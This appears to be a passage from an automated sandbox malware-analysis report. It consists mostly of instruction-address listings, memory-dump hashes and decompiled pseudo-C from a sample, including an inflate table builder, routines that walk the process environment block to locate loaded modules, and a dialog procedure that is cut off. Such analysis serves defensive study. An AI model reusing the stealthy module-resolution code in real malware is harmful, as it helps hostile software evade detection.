0x00406ef2
0x00406ef5
0x00406ef8
0x00406efb
0x00406eff
0x00406f02
0x00406f04
0x00406f07
0x00406f0a
0x00406f24
0x00406f24
0x00406f27
0x00000000
0x00000000
0x00406f2d
0x00406f2d
0x00406f30
0x00406f37
0x00000000
0x00406f37
0x00406f0c
0x00406f0f
0x00406f16
0x00406f19
0x00000000
0x00000000
0x00406f3f
0x00406f3f
0x00406f64
0x00406f64
0x00406f64
0x00406f66
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x00000000
0x00000000
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f59
0x00406f5b
0x00406f5e
0x00406f61
0x00406f61
0x00406f61
0x00406f68
0x00406f70
0x00406f73
0x00406f76
0x00406f78
0x00406f7b
0x00406f7b
0x00406f7d
0x00000000
0x00000000
0x00406f83
0x00406f83
0x00406f86
0x00406f8b
0x00406f8d
0x00406f93
0x00406f95
0x00406faa
0x00406fac
0x00406fac
0x00406f97
0x00406f9d
0x00406f9f
0x00406fa1
0x00406fa1
0x00406fae
0x00406fb2
0x00406fb5
0x00406fbb
0x00406fbb
0x00406fbe
0x00406fbe
0x00406fbe
0x00406fc0
0x00000000
0x00000000
0x00406fc6
0x00406fc6
0x00406fcc
0x00406fce
0x00406ff3
0x00406ff6
0x00406ffc
0x00407001
0x00407007
0x0040700d
0x0040700f
0x00407012
0x0040701b
0x00407021
0x00407021
0x00407014
0x00407016
0x00407018
0x00407018
0x00407023
0x00407029
0x0040702b
0x0040702e
0x00407030
0x00407036
0x00407038
0x0040703a
0x0040703c
0x0040703e
0x00407041
0x0040704a
0x0040704d
0x0040704d
0x00407043
0x00407043
0x00407046
0x00407046
0x00407041
0x00407038
0x0040704f
0x00407051
0x00000000
0x00000000
0x00000000
0x00000000
0x00407051
0x00406fd0
0x00406fd0
0x00406fd6
0x00406fdc
0x00406fde
0x00000000
0x00000000
0x00406fe0
0x00406fe0
0x00406fe2
0x00406fe4
0x00406fed
0x00406fed
0x00406fe6
0x00406fe6
0x00406fe9
0x00406fe9
0x00406fef
0x00406ff1
0x00000000
0x00000000
0x00407057
0x00407057
0x0040705c
0x0040705e
0x0040705f
0x00407060
0x00407061
0x00407067
0x0040706a
0x0040706d
0x00407070
0x00407072
0x00407078
0x00407078
0x0040707b
0x0040707b
0x0040707b
0x0040707b
0x00407084
0x00000000
0x00000000
0x00407089
0x00407089
0x0040708c
0x0040708f
0x00407091
0x00407128
0x00407128
0x0040712b
0x0040712d
0x0040712e
0x0040712f
0x00407132
0x00000000
0x00407132
0x00407097
0x00407097
0x0040709d
0x0040709f
0x004070c4
0x004070c7
0x004070cd
0x004070d2
0x004070d8
0x004070de
0x004070e0
0x004070e3
0x004070ec
0x004070f2
0x004070f2
0x004070e5
0x004070e7
0x004070e9
0x004070e9
0x004070f4
0x004070fa
0x004070fc
0x004070ff
0x00407101
0x00407107
0x00407109
0x0040710b
0x0040710d
0x0040710f
0x00407112
0x0040711b
0x0040711e
0x0040711e
0x00407114
0x00407114
0x00407117
0x00407117
0x00407112
0x00407109
0x00407120
0x00407122
0x00000000
0x00000000
0x00000000
0x00000000
0x00407122
0x004070a1
0x004070a1
0x004070a7
0x004070ad
0x004070af
0x00000000
0x00000000
0x004070b1
0x004070b1
0x004070b3
0x004070b5
0x004070bc
0x004070bc
0x004070be
0x004070b7
0x004070b7
0x004070b9
0x004070b9
0x004070c0
0x004070c2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040713a
0x0040713a
0x0040713d
0x0040713f
0x00407142
0x00407145
0x00407145
0x00407145
0x00407145
0x00000000
0x00000000
0x00000000
0x004067f3
0x004067d7
0x00000000
0x004067dd
0x004067e0
0x004067ea
0x004067ed
0x004067f0
0x00000000
0x004067f0
0x004067d7
0x004067fb
0x004067fe
0x00406802
0x0040680c
0x00406816
0x00406819
0x0040681f
0x00406953
0x00406955
0x0040695b
0x0040695e
0x00406961
0x00000000
0x00406961
0x00406825
0x00406825
0x00406826
0x0040687e
0x0040687e
0x00406885
0x0040692b
0x0040692b
0x00406930
0x00406933
0x00406938
0x0040693b
0x00406940
0x00406943
0x00406948
0x0040694b
0x0040694b
0x00000000
0x0040688b
0x0040688b
0x0040688b
0x0040688b
0x0040688f
0x0040688f
0x004068b1
0x004068b4
0x004068b6
0x004068b9
0x004068be
0x00406894
0x00406894
0x00406899
0x0040689b
0x0040689d
0x004068a2
0x004068a8
0x004068ad
0x004068af
0x004068af
0x004068a4
0x004068a4
0x004068a4
0x004068a2
0x00000000
0x004068c0
0x004068ed
0x004068f2
0x004068f4
0x004068f5
0x004068f7
0x004068f8
0x004068f8
0x004068f8
0x00406920
0x00406925
0x00406925
0x00000000
0x00406925
0x004068be
0x00406885
0x00406828
0x00406828
0x00406829
0x00406873
0x00000000
0x00406873
0x0040682b
0x0040682c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406988
0x00406988
0x00406988
0x0040698b
0x00000000
0x00000000
0x00406968
0x00406968
0x0040696c
0x00000000
0x00000000
0x00406972
0x00406972
0x00406975
0x00406978
0x0040697d
0x0040697f
0x00406982
0x00406985
0x00406985
0x00406985
0x0040698d
0x0040698d
0x00406990
0x00406992
0x00406997
0x0040699a
0x0040699c
0x0040699f
0x00000000
0x00000000
0x004069a5
0x004069a5
0x004069a7
0x00000000
0x00000000
0x004069ad
0x004069ad
0x004069b1
0x00000000
0x00000000
0x004069b7
0x004069b7
0x004069ba
0x004069bc
0x00406a5a
0x00406a5a
0x00406a5d
0x00406a5f
0x00406a5f
0x00406a62
0x00406a65
0x00406a67
0x00406a69
0x00406a6b
0x00406a6b
0x00406a74
0x00406a79
0x00406a7c
0x00406a7f
0x00406a82
0x00406a85
0x00406a85
0x00406a85
0x00406a88
0x00406a8e
0x00406a8e
0x00406a94
0x00406a94
0x00406a94
0x00000000
0x00406a88
0x004069c2
0x004069c2
0x004069c8
0x004069cb
0x004069cd
0x004069f8
0x004069fb
0x00406a01
0x00406a06
0x00406a0c
0x00406a12
0x00406a14
0x00406a17
0x00406a20
0x00406a26
0x00406a26
0x00406a19
0x00406a1b
0x00406a1d
0x00406a1d
0x00406a28
0x00406a2e
0x00406a31
0x00406a33
0x00406a35
0x00406a3b
0x00406a3d
0x00406a3f
0x00406a42
0x00406a4b
0x00406a4b
0x00406a4d
0x00406a44
0x00406a44
0x00406a47
0x00406a47
0x00406a4f
0x00406a4f
0x00406a3d
0x00406a52
0x00406a54
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a54
0x004069cf
0x004069cf
0x004069d5
0x004069db
0x004069dd
0x00000000
0x00000000
0x004069df
0x004069df
0x004069e1
0x004069e3
0x004069e6
0x004069ed
0x004069ed
0x004069ef
0x004069e8
0x004069e8
0x004069ea
0x004069ea
0x004069f1
0x004069f3
0x004069f6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406afa
0x00406afd
0x00406b00
0x00406b06
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cdd
0x00406cdd
0x00406cdd
0x00406ce0
0x00406ce3
0x00406ce5
0x00406ce8
0x00406cee
0x00406cf5
0x00406cf7
0x00000000
0x00000000
0x00406bcb
0x00406bcb
0x00406bf3
0x00406bf3
0x00406bf3
0x00406bf5
0x00000000
0x00000000
0x00406bd3
0x00406bd3
0x00406bd7
0x00000000
0x00000000
0x00406bdd
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be8
0x00406bea
0x00406bed
0x00406bf0
0x00406bf0
0x00406bf0
0x00406bf7
0x00406bf7
0x00406bff
0x00406c02
0x00406c08
0x00406c0b
0x00406c0f
0x00406c13
0x00406c16
0x00406c19
0x00406c31
0x00406c31
0x00406c34
0x00406c42
0x00406c45
0x00406c36
0x00406c36
0x00406c38
0x00406c3f
0x00406c3f
0x00406c6e
0x00406c6e
0x00406c6e
0x00406c71
0x00406c73
0x00000000
0x00000000
0x00406c4e
0x00406c4e
0x00406c52
0x00000000
0x00000000
0x00406c58
0x00406c58
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c65
0x00406c68
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c75
0x00406c75
0x00406c77
0x00406c79
0x00406c84
0x00406c87
0x00406c8a
0x00406c8c
0x00406c8e
0x00406c90
0x00406c93
0x00406c96
0x00406c9b
0x00406c9e
0x00406ca1
0x00406ca4
0x00406cab
0x00406cae
0x00406cb0
0x00000000
0x00000000
0x00406cb6
0x00406cb6
0x00406cba
0x00406ccb
0x00406ccb
0x00406ccb
0x00406ccd
0x00406ccd
0x00406cd1
0x00406cd1
0x00406cd1
0x00406cd3
0x00406cd4
0x00406cd7
0x00406cd7
0x00406cd7
0x00406cda
0x00000000
0x00406cda
0x00406cbc
0x00406cbc
0x00406cbf
0x00000000
0x00000000
0x00406cc5
0x00406cc5
0x00000000
0x00406cc5
0x00406c1b
0x00406c1b
0x00406c1d
0x00406c1f
0x00406c22
0x00406c25
0x00406c29
0x00406c29
0x00406cfd
0x00406cfd
0x00406d00
0x00406d07
0x00406d0b
0x00406d0d
0x00406d10
0x00406d13
0x00406d18
0x00406d1b
0x00406d1d
0x00406d1e
0x00406d21
0x00406d2c
0x00406d2f
0x00406d46
0x00406d4b
0x00406d52
0x00406d57
0x00406d5b
0x00406d5d
0x00406d5d
0x00406d5d
0x00406d60
0x00406d62
0x00000000
0x00406d68
0x00406d68
0x00406d6c
0x00406d77
0x00406d8a
0x00406d8f
0x00406d94
0x00406d96
0x00000000
0x00000000
0x00406d9c
0x00406d9c
0x00406d9f
0x00406da1
0x00406daf
0x00406daf
0x00406db2
0x00406db2
0x00406db5
0x00406db8
0x00406dbb
0x00406dbe
0x00406dc1
0x00406dc4
0x00000000
0x00406dc4
0x00406da3
0x00406da3
0x00406da9
0x00000000
0x00000000
0x00000000
0x00406da9
0x00000000
0x00000000
0x00000000
0x00407148
0x00407148
0x0040714e
0x00407154
0x00407159
0x0040715f
0x00407165
0x00407167
0x0040716a
0x00407173
0x00407179
0x00407179
0x0040716c
0x0040716e
0x00407170
0x00407170
0x0040717b
0x0040717d
0x00407180
0x004071bb
0x004071bb
0x00000000
0x00407182
0x00407182
0x00407182
0x00407188
0x0040718b
0x0040718d
0x004071c2
0x004071c4
0x00000000
0x004071c4
0x00000000
0x0040718d
0x00000000
0x004067cc
0x0040719a
0x00000000
0x0040719a
0x00406bae
0x00406bb0
0x00000000
0x00000000
0x00406bb2
0x00406bb2
0x00406bb5
0x00000000
0x00406bb5
0x00406afa
0x00406abb
0x0040719f
0x004071a2
0x004071a4
0x004071ad
0x004071b3
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00407272, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6d0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6d0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x0040727d
0x00407285
0x00407289
0x0040728b
0x0040728e
0x00407290
0x00407290
0x00407292
0x00407299
0x0040729b
0x0040729b
0x004072a1
0x004072b6
0x004072be
0x004072c0
0x004072c2
0x004072c5
0x004072c6
0x004072c6
0x004072cc
0x00000000
0x00000000
0x004072ce
0x004072d1
0x00000000
0x00000000
0x00000000
0x004072d1
0x004072d5
0x004072d8
0x004072da
0x004072da
0x004072dd
0x004072e3
0x004072e4
0x00000000
0x00000000
0x00000000
0x004072e4
0x004072e9
0x004072ec
0x004072ee
0x004072ee
0x004072f4
0x004072f6
0x00407307
0x004072fa
0x004072fe
0x004075a3
0x00000000
0x004075a3
0x00407304
0x00407305
0x00407305
0x0040730d
0x00407310
0x00407314
0x00407316
0x00407318
0x0040731b
0x00000000
0x00000000
0x00407323
0x00407329
0x0040732b
0x0040732d
0x0040732e
0x00407343
0x00407343
0x00407346
0x00407348
0x00407348
0x0040734a
0x0040734f
0x00407351
0x00407358
0x0040735a
0x00407362
0x00407362
0x00407364
0x00407365
0x00407374
0x00407378
0x0040737c
0x0040737f
0x00407382
0x00407387
0x0040738a
0x00407390
0x00407397
0x0040739d
0x00407596
0x00407596
0x0040759b
0x004075aa
0x00000000
0x00000000
0x00000000
0x0040759b
0x004073aa
0x004073ad
0x004073b0
0x004073b3
0x004073b7
0x00000000
0x00000000
0x004073c2
0x004073c5
0x004073c6
0x004073c8
0x004073ce
0x004073d1
0x00000000
0x00000000
0x004073d7
0x004073d8
0x004073db
0x004073de
0x004073e1
0x004073e7
0x004073e9
0x004073e9
0x004073f1
0x004073f5
0x004073fa
0x0040741f
0x00407425
0x00407427
0x00407429
0x0040742c
0x00407435
0x00000000
0x00000000
0x004073fc
0x004073fc
0x00407405
0x00407409
0x00000000
0x00000000
0x0040741a
0x0040741a
0x0040741d
0x00000000
0x00000000
0x0040740d
0x00407410
0x00407412
0x00407416
0x00000000
0x00000000
0x00407418
0x00407418
0x00000000
0x0040741a
0x0040743e
0x00407444
0x0040744e
0x00407450
0x00407455
0x00407457
0x0040748d
0x00407459
0x00407459
0x0040745c
0x0040745f
0x00407469
0x0040746c
0x00407473
0x0040747e
0x00407485
0x00407485
0x0040748f
0x00407492
0x00407494
0x0040749a
0x0040749a
0x004074a3
0x004074a6
0x004074ab
0x004074ba
0x004074c2
0x004074c7
0x004074eb
0x004074f3
0x004074f7
0x004074fd
0x004074c9
0x004074d7
0x004074da
0x004074e0
0x004074e0
0x00407501
0x004074bc
0x004074bc
0x004074bc
0x00407512
0x00407516
0x00407522
0x0040751d
0x00407520
0x00407520
0x0040752a
0x0040752f
0x00407537
0x00407533
0x00407535
0x00407535
0x0040753d
0x0040753f
0x00407546
0x00407550
0x0040755a
0x00407576
0x0040757a
0x004073bf
0x004073c5
0x004073c6
0x004073c8
0x004073ce
0x004073d1
0x00000000
0x00000000
0x00000000
0x004073d1
0x00000000
0x00000000
0x00000000
0x00000000
0x0040755c
0x0040755c
0x0040755c
0x00407561
0x0040756a
0x00407573
0x00000000
0x00407573
0x00407580
0x00407580
0x00407583
0x0040758a
0x0040758d
0x00000000
0x004073b0
0x00407330
0x00407332
0x00407332
0x00407336
0x00407339
0x0040733a
0x0040733a
0x00000000
0x00407332
0x004072a6
0x004072ac
0x00000000

Memory Dump Source

Source File: 00000000.00000002.240587109.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.240583232.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240593870.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.240597305.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240605351.000000000041D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240610935.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240616562.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.240619861.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
Instruction ID: 0a9d7053db9648894e52107a0598598bb6c65082166a45c8961a79b8daba83ed
Opcode Fuzzy Hash: e205b8326ae89ea7e41b2cb83266b2effedd335e5b54ad7d386a065d8ff2d5ef
Instruction Fuzzy Hash: 7AC13831E042199BCF18CF68D8905EEBBB2BF99314F25826AD85677380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 10004767, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004767(void* __eflags, intOrPtr* _a4) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _t35;

				_v16 =  *[fs:0x30];
				_v12 =  *((intOrPtr*)(_v16 + 0xc));
				_v20 =  *((intOrPtr*)(_v12 + 0xc));
				_v8 =  *((intOrPtr*)(_v12 + 0xc));
				while(E100046AB(_t35,  *((intOrPtr*)(_v8 + 0x30)), _a4) != 0) {
					_v8 =  *_v8;
					if(_v8 != _v20) {
						continue;
					}
					return 0;
				}
				return  *((intOrPtr*)(_v8 + 0x28));
			}

0x10004773
0x1000477c
0x10004785
0x1000478e
0x10004791
0x100047b0
0x100047b9
0x00000000
0x00000000
0x00000000
0x100047bb
0x00000000

Memory Dump Source

Source File: 00000000.00000002.241943494.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.241682424.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241819208.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.241866265.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241953388.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
Instruction ID: 6ef50328bcb0267dddef8ca2fe2f5a4d29e3e4d24b0f6da1fa4968963f46e783
Opcode Fuzzy Hash: 3a60233801de0e8d64e4fc61689fdab8e9d3162a2ace7c33a53d9f49bfda1752
Instruction Fuzzy Hash: 7F014D78A14209EFDB40DF98C580D9DFBF4FB09260F118595E918E7711E730AE50AB45

Uniqueness

Uniqueness Score: -1.00%

Function 10004564, Relevance: .0, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10004564() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x1000457b

Memory Dump Source

Source File: 00000000.00000002.241943494.0000000010003000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.241682424.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241819208.0000000010001000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.241866265.0000000010002000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.241953388.0000000010005000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 00404CD6, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404CD6(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f488;
				_v28 =  *0x42f454 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f45d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
